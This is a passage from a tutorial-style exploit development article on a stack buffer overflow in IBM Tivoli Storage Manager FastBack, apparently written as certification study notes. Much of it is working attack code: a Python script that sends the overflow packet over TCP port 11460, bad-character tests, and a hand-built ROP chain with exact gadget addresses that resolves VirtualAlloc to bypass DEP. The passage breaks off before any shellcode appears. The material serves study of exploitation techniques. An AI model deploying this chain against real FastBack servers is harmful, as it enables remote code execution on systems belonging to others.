Background

This article originated from a collection of my personal notes and hands-on experiences while pursuing the Windows Exploit Development certification. It was written not only as personal documentation but also to address the lack of available references on Windows exploitation, especially regarding techniques for bypassing existing protection windows mechanisms.

The topics covered in this series of articles will continue with several additional topics that I have prepared in draft form. These drafts are based on my personal notes and will gradually be converted into well-structured articles that are easy to read and understand, especially for those who want to explore these topics further. This article is also available in bahasa, which you can find on the overhack publication page at medium.com/overhack - feel free to check it out!

Technical Overview

In this article, we will discuss Buffer Overflow vulnerabilities in IBM Tivoli Storage Manager FastBack versions 5.5.x and 6.x ≤ 6.1.1 as a case study. The main focus of this article is not just basic exploitation, but how we can bypass memory protection in Windows 10, specifically Data Execution Prevention (DEP).

PNG

PNG |

We will use the Return-Oriented Programming (ROP) technique by utilizing the Windows API. Although there are several APIs that are commonly used to bypass DEP (such as VirtualProtect and WriteProcessMemory), this time we will focus on VirtualAlloc (VirtualAllocStub) to allocate, as well as grant permission to one memory region (for example the stack) of a running application process so that our code can be executed.

No Mona No Problem!

Although this process can actually be completed automatically using plugins such as mona.py, in this discussion we will try a manual approach by building a ROP chain from scratch. This means that we will write each ROP gadget one by one to form a complete chain in order to achieve our exploitation goals.

PNG

PNG |

That means we’ll write each ROP gadget one by one to build a complete chain to achieve our exploitation goals.

Vulnerability Analysis

Since we already know that the application has a published buffer overflow vulnerability, we will skip the reverse engineering and fuzzing processes. We can directly refer to the exploit database to speed up the process, so we can focus fully on the exploitation stage and bypass the current memory protection.

EDB-ID: https://www.exploit-db.com/exploits/38980

CODE | 18

# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk 
# function caused by the insecure usage of _sscanf while parsing user-controlled 
# input.
#
.text:0057898E      lea     eax, [ebp+var_210]
.text:00578994      push    eax
.text:00578995      lea     ecx, [ebp+var_108]
.text:0057899B      push    ecx
.text:0057899C      lea     edx, [ebp+var_20C]
.text:005789A2      push    edx
.text:005789A3      lea     eax, [ebp+var_4]
.text:005789A6      push    eax
.text:005789A7      lea     ecx, [ebp+var_104]      <=== Buffer that will be overwritten
.text:005789AD      push    ecx
.text:005789AE      push    offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
.text:005789B3      mov     edx, [ebp+Src]
.text:005789B6      push    edx             ; Src   <=== Buffer under our control
.text:005789B7      call    _sscanf                 <=== Stack Buffer Overflow!!!

In general, this vulnerability occurs due to the use of unsafe sscanf when processing user input in the FXCLI_GetConfFileChunk function. If the user sends data that exceeds the buffer capacity, the application will crash, allowing us to control the EIP value by overwriting the return address in the stack.

Vulnerability Validation

The first thing that we do is to validate the issue by running the following script, which has been specifically designed to send more data than the target buffer’s capacity, so that we can see exactly how the application responds to overflow conditions in the debugger.

CODE | 33

import socket
import sys
from struct import pack

#psAgentCommand
buf = bytearray([0x41]*0xC)
buf += pack("<i", 0x534)  # opcode
buf += pack("<i", 0x0)    # 1st memcpy: offset
buf += pack("<i", 0x500)  # 1st memcpy: size field
buf += pack("<i", 0x0)    # 2nd memcpy: offset
buf += pack("<i", 0x100)  # 2nd memcpy: size field
buf += pack("<i", 0x0)    # 3rd memcpy: offset
buf += pack("<i", 0x100)  # 3rd memcpy: size field
buf += bytearray([0x41]*0x8)
# psCommandBuffer
formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (b"A"*0x200,0,0,0,0)
buf += formatString
# Checksum
buf = pack(">i", len(buf)-4) + buf
def main():
 if len(sys.argv) != 2:
  print("Usage: %s <ip_address>\n" % (sys.argv[0]))
  sys.exit(1)
 server = sys.argv[1]
 port = 11460
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((server, port))
 s.send(buf)
 s.close()
 print("[+] Packet sent")
 sys.exit(0)
if __name__ == "__main__":
  main()

After running the script, the payload we sent would cause the application to crash. The extended instruction pointer (EIP) register would be overwritten with the pattern “AAAA” (0x41414141).

PNG

PNG |

This condition shows that the EIP value can be controlled through the data we enter, so that the program execution flow is under our control later on. In other words, at this stage we have validated and proven that this application is vulnerable to buffer overflow.

Getting the Offset

Even though we can control the program’s execution flow, we still don’t know exactly where the EIP will be overwritten in the buffer. Therefore, we need to create a unique cyclic pattern string of 0x200 bytes (512 decimal places) using msf-pattern_create to find the exact offset.

CODE | 1

msf-pattern_create -l 0x200

Next, we replace the buffer that was previously filled with the character “A” (0x41) with the unique pattern that has been generated. The goal is that when the program crashes, the EIP value will contain part of the pattern, which can then be analyzed to determine the accurate EIP offset position within the buffer.

PNG

PNG |

After sending the cyclic pattern, the application crashes again. This time, when we check the debugger, we can see that the EIP register has been overwritten with a specific hexadecimal value from the pattern we sent (e.g 0x41326a41)

PNG

PNG |

We can use the msf-pattern_offset tool to calculate the exact distance from the start of the buffer to the point where EIP is overwritten.

CODE | 2

$ msf-pattern_offset -q  41326a41
[*] Exact match at offset 276

From the results, we obtain a match offset of 276, meaning that we need 276 bytes of junk as padding before placing the first memory address (Overwriting the EIP) to control the program’s execution flow.

The next step is to find out where our data is located in memory. In most cases, the ESP register will point to the stack area that contains the rest of the buffer after EIP.

PNG

PNG |

By checking the value pointed to by ESP at the time of the crash and analyzing it again using msf-pattern_offset, we get a value of 280. This indicates that ESP points to the area 4 bytes after EIP, which is exactly the beginning of the additional data we sent.

PNG

PNG |

Once we know the EIP and ESP offsets, we can update our exploit script to reflect the correct structure.

CODE | 7

# psCommandBuffer
offset = b"A" * 276
eip = b"B" * 4
rop = b"C" * (0x400 - 276 - 4)

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+eip+rop,0,0,0,0)
buf += formatString

At this point, we can control EIP and have space for our payload.

Identify Bad Characters

On Windows, we need to detect characters that cannot be processed correctly by the application, whether due to null bytes (0x00), new lines (0x0A), spaces (0x20), or other characters that require special treatment. Knowing bad characters from the start is very important, because later we will deal a lot with ROP gadgets, especially in a Windows environment, to avoid crashes midway because our payload is corrupted.

To detect them, we can enter all hexadecimal values between 0x01 and 0xFF into the buffer and send them to the application:

CODE | 27

# psCommandBuffer
offset = b"A" * 276
eip = b"B" * 4 # Overwrite EIP, nanti ganti dengan alamat gadget

# Badchars string 
badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
#rop = b"C" * (0x400 - 276 - 4)
formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset + eip + badchars,0,0,0,0)
buf += formatString

After the payload was sent and the application crashed, we checked the contents of the stack using a debugger. The goal was to ensure that the entire array of bytes appeared in sequence without any missing or altered characters.

To view the contents of the stack area and verify that all characters were entered correctly, we used commands such as db esp -10 L20 or dd esp, then compared the results with the list of bad characters.

Every byte that is missing or altered is categorized as a bad character and must be avoided in the next payload.

PNG

PNG |

Based on the output above, it appears that characters 0x01 to 0x08 have successfully been entered into the memory. However, character 0x09 does not appear, so we can assume that 0x09 is a bad character. Therefore, we will remove that character from the list, rerun the script, and then repeat the same process to find the next bad character:

CODE | 18

badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

Once it has been restarted and the buffer stops at 0x08, it is likely that 0x0A, 0x0B, 0x0C, and 0x0D are also bad characters. Let’s continue this process step by step until every character has been checked and tested.

PNG

PNG |

After completing the iterative process, we determined that the characters causing buffer corruption are as follows: 0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, and 0x02.

CODE | 19

# Badchars string (0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20)
badchars = (
  b"\x01\x02\x03\x04\x05\x06\x07\x08\x0e\x0f\x10"
  b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

Identifying Modules for ROP Chain

The next step is to locate the PE (Portable Executable) files or modules loaded by the application that may be useful in creating a ROP chain. The criteria are that we need modules that do not have memory protection such as ASLR, Rebase, or CFG. To verify this, we can use debugger extensions such as Narly (for WinDbg) or Mona.py (for Immunity Debugger).

PNG

PNG |

Based on the obtained output, the main process module (FastBackServer) cannot be used because its base address starts with 0x00, which means it contains a NULL byte. The presence of this NULL byte can potentially terminate our payload prematurely, so this module must be avoided. Therefore, we need to look for another module whose base address is sufficiently clean and free of NULL bytes.

According to the search results, there are four modules that are quite interesting and can be used:

CSFTPAV6.DLL
CSMTPAV6.DLL
CSNCDAV6.DLL
SNFS.DLL

In this scenario, we selected CSFTPAV6.DLL as its base address was clean and did not contain any NULL bytes, making it very suitable for our reference gadget.

CODE | 4

0:077> lm m CSFTPAV6
Browse full module list
start    end        module name
50500000 50577000   CSFTPAV6   (deferred)

Gadget Analysis and Extraction

After we have determined the target module, the next step is to analyze the module we selected (CSFTPAV6.DLL) to find the gadgets we will use. We can use the tool rp-win-x86.exe (rp++) to scan the instructions inside it with the following command: rp-win-x86.exe -f csftpav6.dll -r 5 > rop.txt

PNG

PNG |

Note: The parameter -r 5 means we are searching for gadgets with a maximum length of 5 instructions, and the results are then saved into the file rop.txt

If we tried to open the generated file, we can see that all gadget addresses start with 0x50. This proves that our decision to avoid null bytes was correct from the module‑selection stage.

PNG

PNG |

As a more efficient alternative, we can also use the script find-gadgets.py created by epi.

PNG

PNG |

The main advantage of this script is the ability to group gadgets and display them in a more organized way (with minimal garbage instructions before the final ret instruction). This makes the process of searching for specific gadgets much more effective than manually scanning through text files.

With the collected gadget set, we can now start constructing the ROP chain itself. The main goal is to manipulate memory protection (e.g changing the flag to PAGE_EXECUTE_READWRITE) or allocate executable memory so that our shellcode can run and successfully bypass DEP.

Constructing The ROP Chain Skeleton

After successfully collecting gadgets from CSFTPAV6, the next step is to chain them into a ROP chain. But before we start assembling it, we need to first understand the Windows API function we will be using.

The VirtualAlloc API Prototype

The first thing we need to know about VirtualAlloc is its function prototype. Based on Microsoft documentation, this function has the following prototype:

CODE | 6

LPVOID VirtualAlloc(  
  LPVOID lpAddress,        // 1. Memory address to allocate/change  
  SIZE_T dwSize,           // 2. Memory size  
  DWORD  flAllocationType, // 3. Allocation type (e.g., MEM_COMMIT)  
  DWORD  flProtect         // 4. Memory permissions (our target: PAGE_EXECUTE_READWRITE)  
);

Understanding the Stack Layout

In x86 architecture, when a function is called, its arguments must be arranged neatly on the stack in a specific order. Since here we are manipulating the program flow (not calling the function normally), we must create a fake stack frame.

The stack structure we must assemble manually is:

VirtualAlloc Address: The address of the function itself (this is what will go into EIP).
Return Address: The destination address after VirtualAlloc finishes executing (later we will point this to the shellcode).
Arguments: The four VirtualAlloc parameters (lpAddress, dwSize, flAllocationType, flProtect) arranged sequentially after the return address with appropriate values.

Building the Skeleton in Python

Since the entire stack structure must be constructed manually, we cannot directly fill in the actual values for every parameter. Addresses like VirtualAlloc and the shellcode position (lpAddress) are often dynamic (changing with every execution) or contain bad characters if inserted raw.

Therefore, as an initial step, we will fill those parameters with dummy values. These temporary values will later be overwritten (patched) dynamically using ROP gadgets after the ROP chain is fully constructed.

Here is the implementation:

CODE | 17


# Placeholder VirtualAlloc

va  = pack("<L", (0x45454545)) # [Function] Dummy VirtualAlloc Address (Akan dipatch)
va += pack("<L", (0x46464646)) # [Ret Addr] Shellcode Return Address (Jump ke shellcode setelah VirtualAlloc selesai)
va += pack("<L", (0x47474747)) # [Arg 1] Dummy lpAddress: Lokasi shellcode
va += pack("<L", (0x48484848)) # [Arg 2] Dummy dwSize: Ukuran shellcode
va += pack("<L", (0x49494949)) # [Arg 3] Dummy flAllocationType: (0x1000 / MEM_COMMIT)
va += pack("<L", (0x51515151)) # [Arg 4] Dummy flProtect: (0x40 / PAGE_EXECUTE_READWRITE)

# Adjust offset calculation to include the ROP skeleton
offset = b"A" * (276 - len(va))
eip = b"B" * 4
rop = b"C" * (0x400 - 276 - 4)

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset + va + eip + rop,0,0,0,0)
buf += formatString

Verifying Stack Layout

To ensure all values are loaded into the stack in the correct positions, we rerun the updated skeleton script again and inspect the stack condition in WinDbg using the command: dd esp -1C

PNG

PNG |

Based on the verification results, it appears that the lpAddress parameter (0x47474747) and flAllocationType parameter (0x49494949) are not loaded correctly because they were overwritten by null bytes from previous string operations. However, we can temporarily ignore this issue, as these values will be replaced with valid values through ROP gadgets before the VirtualAlloc function is executed.

Preparing the Stack

The next step is to replace (patch) the six dummy values (placeholders) we prepared earlier before executing VirtualAlloc.

The first thing we need to do is find out the current stack address, specifically the position of the dummy values we are going to fill, so that those dummy values can be referenced and manipulated by ROP gadgets in the subsequent steps.

Saving Extended Stack Pointer Address

The most common way to get this address is by using the the ESP register during exploitation.

Since ESP points to the location of the next gadget execution, we cannot directly modify its value. As a solution, we need to copy the ESP value to another register so it can be used as a reference without disrupting the ESP flow itself.

Gadget Selection

Ideally, we need a gadget that can copy ESP to another register such as EAX, ESI, EBX, or EDI (General Purpose). Unfortunately, direct instruction patterns like mov eax, esp ; ret is rarely available naturally inside a module. Therefore, a combination of push and pop instructions is often the best alternative.

After searching in the CSFTPAV6.DLL module, we found the following gadget that can be used to copy ESP to the ESI register:

CODE | 1

0x50501110: push esp ; push eax ; pop edi ; pop esi ; ret

Considering that the stack principle is LIFO (Last In, First Out), below is how the instructions in the gadget work:

push esp : Pushes or store the ESP value (current stack address) onto the stack.
push eax : Store the EAX value into the stack (now this value is at the top position).
pop edi : Take the top value from the stack (the EAX value) into the EDI register.
pop esi : Take the next value from the stack (the ESP value that we saved at the beginning) and put it into the ESI register. At this point, our target is reached (ESI = ESP). ret : Take the next return address from the stack to continue execution to the next gadget

Basically, by mapping ESP to ESI, we already have a static reference to point to the stack position. The next step is to update the skeleton script by replacing the value of the EIP variable with the address of this gadget.

PNG

PNG |

Verifying the Gadget

After updating the skeleton script, we run the exploit again and set a breakpoint at that gadget address to verify the flow in the debugger.

PNG

PNG |

From the debugger output, we can see that the ESI value is already correct, which contains a copy of ESP. This indicates the gadget worked as expected.

Exploring Alternative Gadgets

Are we restricted to using only the previous gadget to copy the ESP value? The answer is of course not. Everything depends on the availability of gadgets in existing modules.

PNG

PNG |

In this case, we can use another gadget, for example push esp ; sub eax, 0x20 ; pop ebx ; ret from the SNFS.DLL module to copy ESP to another register (EBX).

CODE | 1

.\rp-win-x86.exe -f snfs.dll -r 5 > rop.txt

Interestingly, although this gadget contains the arithmetic instruction sub eax, 0x20 in the middle, it does not affect the stack contents that hold the ESP value we just pushed. So, when the pop EBX instruction is executed, the ESP value stored on the stack will still be perfectly copied to the EBX register.

PNG

PNG |

After running it, we can verify again in the debugger that the EBX register now has the same value as ESP

In short, when constructing a ROP chain, we can use any gadget as long as it helps achieve our goal. Feel free to choose the path, there are no strict rules and we are free to be creative in finding alternative paths, as long as the result remains stable and achievable

However, keep in mind that every memory address or instruction used must not contain bad characters or null bytes.

Retrieving VirtualAlloc Pointer from IAT

As we already knew before, we must get the address of VirtualAlloc dynamically while the exploit is running. This is necessary due to ASLR (Address Space Layout Randomization) protections and different Windows versions, which cause function addresses in kernel32.dll change every time the system reboots. Therefore, we cannot hardcode this function address directly in our skeleton script.

So instead, we can retrieve the function address from the Import Address Table (IAT) of the CSFTPAV6.dll module. The IAT stores the real addresses of API functions imported by the module. Even though the VirtualAlloc address changes, the IAT entry address pointing to that function remains static as long as the module is loaded. This way, we can rely on the IAT as a stable reference in our ROP chain.

Finding the IAT Address

We can use IDA Free/Pro to check the IAT of the loaded module or look directly from the debugger to find where CSFTPAV6.DLL stores the pointer to VirtualAlloc.

PNG

PNG |

From our check, we found that the address 0x5054A220 is the IAT entry for VirtualAlloc

Calculating the Stack Offset for VirtualAlloc

Currently, we have a stack pointer in the ESI register and also know that we have inserted the dummy value 0x45454545 as a placeholder for the VirtualAlloc address into the stack.

Now, we need to calculate the distance (offset) between the current ESI position and that placeholder position on the stack. From the calculation in the debugger, we see a difference of 0x1C bytes. This means our dummy values position are located 0x1C bytes “below” the current ESP position.

PNG

PNG |

In other words, if we want to access this dummy value, we must perform an arithmetic operation to shift the stack address down by 0x1C bytes so it points exactly to the placeholder address.

CODE | 9

0:062> dd esp - 0x1c
0d59e300  45454545 46464646 00000000 48484848
0d59e310  00000000 00000000 0d59e31c 43434343
0d59e320  43434343 43434343 43434343 43434343
0d59e330  43434343 43434343 43434343 43434343
0d59e340  43434343 43434343 43434343 43434343
0d59e350  43434343 43434343 43434343 43434343
0d59e360  43434343 43434343 43434343 43434343
0d59e370  43434343 43434343 43434343 43434343

Since we already copied the ESP value to ESI in the previous step. Our target now is to perform the operation ESI = ESI - 0x1C so that ESI points exactly to that placeholder address. Unfortunately, a simple gadget like sub esi, 0x1c ; ret is not available in the CSFTPAV6.DLL module. Therefore, we need to find a more creative alternative to achieve the same goal.

Handling Null Bytes via Negative Offsets

One possible approach is to push the value 0x1C onto the stack, pop it into another register (e.g., EAX), and then subtract the registers (SUB ESI, EAX). However, this approach has a limitation because the value 0x0000001C contains a null byte (00).

The presence of this null byte will be treated as a string terminator, which could potentially break our payload later. Therefore, we must avoid using this value directly by using the two’s complement concept.

CODE | 10

0:062> .formats 0x1C
Evaluate expression:
  Hex:     000000 1c
  Decimal: 28
  Octal:   00000000034
  Binary:  00000000 00000000 00000000 00011100
  Chars:   ....
  Time:    Wed Dec 31 16:00:28 1969
  Float:   low 3.92364e-044 high 0
  Double:  1.38338e-322

We can reverse the logic, instead of subtracting the positive value 0x1C, we will add a negative -0x1C. In computer representation, -0x1C is stored as a large 32-bit hexadecimal number (0xFFFFFFE4), which is crucially free of null bytes.

CODE | 10

0:062> .formats -0x1C
Evaluate expression:
  Hex:     ffffffe4
  Decimal: -28
  Octal:   37777777744
  Binary:  11111111 11111111 11111111 11100100
  Chars:   ....
  Time:    ***** Invalid
  Float:   low -1.#QNAN high -1.#QNAN
  Double:  -1.#QNAN

Once we obtain the negative value, the next step is to add it to the ESP address that we saved earlier in ESI. Since registers like EAX and ECX registers usually have more gadget variations for arithmetic operations like ADD, POP, or MOV, it is more practical to perform the calculation using those registers.

The approach or plan is roughly like this:

Copy the stack pointer value (currently in ESI) to EAX.
Load the value -0x1C (0xFFFFFFE4) into the ECX register.
Perform the addition ADD EAX, ECX. The result (ESP + -0x1C) will be stored in EAX.
After that, copy the result from EAX back into ESI to keep our reference flow consistent.

Implementation of the ROP Chain

Below is the gadget chain to carry out our plan. For the first step, we need to copy the ESI register into EAX. After searching for gadgets, we found mov eax, esi ; pop esi ; retn.

CODE | 2

rop = pack("<L", (0x5050118e))  # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # Padding (Junk)

Because this gadget has an extra instruction (pop esi), we must add padding (junk data) after it so the execution flow stays correct. Basically, this pop esi instruction will ”consume” 4 bytes of data from the stack. This situation is common, since it is very hard to find a perfect gadget without side effects.

PNG

PNG |

Next, we use the pop ecx gadget to load our negative value.

CODE | 4

## Load Negative Offset (-0x1C) to ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe4)) # -0x1C (Two complements)

With the values ready in EAX and ECX, we just need to add EAX with ECX using the ADD EAX, ECX gadget and move the result into ESI for the next steps.

CODE | 5

## Add EAX and ECX (EAX = EAX + ECX)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Move result back to ESI
rop += pack("<L", (0x50537d5b)) # push eax ; pop esi ; ret

At this point, ESI now points exactly to the placeholder location on the stack, ready for the next patching stages.

PNG

PNG |

Patching VirtualAlloc Addresses

After successfully determining the offset for the placeholder on the stack at runtime, the next step is to patch the dummy value with the VirtualAlloc function address that we previously obtained from the Import Address Table (0x5054A220).

PNG

PNG |

Handling Bad Characters in VirtualAlloc Addresses

However, because the last byte of that address contains the value 0x20 (space), which is one of the bad characters in our scenario, we cannot load the address 0x5054A220 directly into the payload.

Therefore, to solve this problem, we will use a runtime address adjustment approach:

We increase the address by one byte to 0x5054A221 so it is free from bad characters.
After the address is loaded into a register, subtract it again by -1 (0xFFFFFFFF) using an arithmetic gadget to get the original address 0x5054A220.

Here iss the implementation of this runtime address adjustment inside the ROP chain that we will build.

Loading the Modified Address

The first step is to put the modified address (0x5054A221) into the EAX register.

CODE | 2

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret
rop += pack("<L", (0x5054A221)) # VirtualAlloc IAT + 1

PNG

PNG |

Adjust and Restoring the Address

Next, we need the value -1 as the operand for subtraction. In 32-bit hexadecimal representation, -1 is written as 0xFFFFFFFF and this value will be loaded into the ECX register.

Once both values are in the registers, we add the value in EAX (0x5054A221) with the value in ECX (-1) using the add eax, ecx ; ret gadget to return EAX to the correct IAT address.

CODE | 2

## Add EAX and ECX (0x5054A221 + -1 = 0x5054A220)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

At this point, our EAX register now holds the value 0x5054A220. Howver, remember that this is just the IAT entry address, not the actual VirtualAlloc function address.

PNG

PNG |

Resolving the Function Pointer

Therefore, we need to take the actual VirtualAlloc address stored inside that IAT entry. To do this, we use the mov eax, dword ptr [eax] ; ret gadget to dereference it.

CODE | 1

rop += pack("<L", (0x5051f278)) # mov eax, dword [eax] ; ret

This instruction will change the content of EAX and before execution, it contained the IAT address (0x5054A220).

PNG

PNG |

Then after execution, it will contain the actual VirtualAlloc function address in memory (0x75AD38C0).

Patching the Stack Placeholder

The final step is to overwrite the placeholder (0x45454545) on the stack with the VirtualAlloc address that stored inside the EAX register.

PNG

PNG |

To do this, we use the gadget mov dword [esi], eax ; ret, to write the EAX value to the address pointed to by ESI (the placeholder location).

CODE | 2

## Patch the placeholder with the real VirtualAlloc address
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

With this step completed, the placeholder is dynamically replaced with the correct VirtualAlloc address, and the ROP chain successfully resolves the function at runtime.

PNG

PNG |

PNG

PNG |

Here is the complete code snippet for the entire process that we just discussed

CODE | 25

# Obtain & Patch VirtualAlloc Address

rop = pack("<L", (0x5050118e))  # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # Padding (Junk)
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe4)) # -0x1C
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret
rop += pack("<L", (0x50537d5b)) # push eax ; pop esi ; ret

## Load Sanitized IAT Address (+1 to avoid null byte)
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret
rop += pack("<L", (0x5054A221)) #  IAT Address + 1 (0x5054A220 + 1)

## Prepare -1 in ECX for Restore
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffff)) # -1 (Two's Complement)

## Restore Original Address (EAX + ECX)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Dereference to get actual function address
rop += pack("<L", (0x5051f278)) # mov eax, dword [eax] ; ret

## Patch the placeholder with the real VirtualAlloc address
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Patching Return Address

The next step is to patching the return address on the stack so that the program execution flow move or jumps straight to our shellcode right after VirtualAlloc finishes its job. However, before we can overwrite it with the shellcode address, we must first make sure that ESI points to the correct stack location.

PNG

PNG |

Currently, the ESI pointer still points to the VirtualAlloc address (from the previous stage). In a typical stack layout, the return address is placed immediately after the function address. This means it is located 4 bytes ahead of the current ESI position. Therefore, our goal is to increment ESI by 4 bytes so it points precisely to the placeholder 0x46464646.

Aligning ESI to the Placeholder

Ideally, we would use a single efficient instruction like add esi, 0x04 ; ret. Unfortunately, such a “clean” gadget like that is not available inside CSFTPAV6.DLL.

As an alternative, we use the inc esi gadget (increment ESI +1) executed four times in a row, which gives the same final result (ESI moves forward 4 bytes).

CODE | 6

## Patching Return Address by 4 bytes

rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

The additional instruction add al, 0x2B inside the gadget is only an unwanted instruction and does not significantly affect the ESI register or our stack flow, so it is safe to use.

PNG

PNG |

After these four lines are executed, the ESI pointer now points exactly to the placeholder 0x46464646 on the stack.

Calculating the Shellcode Address

The next step is to fill the return address placeholder (currently pointed by ESI) with our shellcode address. The main problem is we don’t know the exact absolute address of the shellcode in memory because it moves around or dynamic
